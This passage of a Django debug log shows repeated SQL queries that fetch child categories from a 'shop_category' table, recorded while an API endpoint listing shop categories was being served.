"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-29 19:45:41,232 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-29 19:45:41,236 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-29 19:45:41,238 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-29 19:45:41,240 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-29 19:45:41,242 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-29 19:45:41,245 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-29 19:45:41,247 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-29 19:45:41,250 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-29 19:45:41,252 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-29 19:45:41,254 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-29 19:45:41,257 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-29 19:45:41,259 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-29 19:45:41,262 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-29 19:45:41,264 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-29 19:45:41,267 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-29 19:45:41,269 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-29 19:45:41,271 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-29 19:45:41,275 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-29 19:45:41,277 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-29 19:45:41,279 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-29 19:45:41,281 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-29 19:45:41,283 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-29 19:45:41,285 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-29 19:45:41,288 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-29 19:45:41,290 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-29 19:45:41,292 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-29 19:45:41,295 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-29 19:45:41,297 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [29/Dec/2019 19:45:41] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-29 19:45:44,492 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-29 19:45:44,499 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-29 19:45:44,503 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-29 19:45:44,505 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-29 19:45:44,509 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-29 19:45:44,512 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-29 19:45:44,515 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-29 19:45:44,518 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-29 19:45:44,520 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-29 19:45:44,524 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-29 19:45:44,526 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-29 19:45:44,528 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-29 19:45:44,530 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-29 19:45:44,533 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-29 19:45:44,536 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-29 19:45:44,539 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-29 19:45:44,542 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-29 19:45:44,545 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-29 19:45:44,548 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-29 19:45:44,551 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-29 19:45:44,554 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-29 19:45:44,556 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-29 19:45:44,558 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-29 19:45:44,560 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-29 19:45:44,562 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-29 19:45:44,566 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-29 19:45:44,568 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-29 19:45:44,571 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-29 19:45:44,573 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-29 19:45:44,575 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-29 19:45:44,578 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-29 19:45:44,580 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-29 19:45:44,583 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-29 19:45:44,585 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-29 19:45:44,587 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-29 19:45:44,591 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-29 19:45:44,593 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-29 19:45:44,595 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-29 19:45:44,597 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 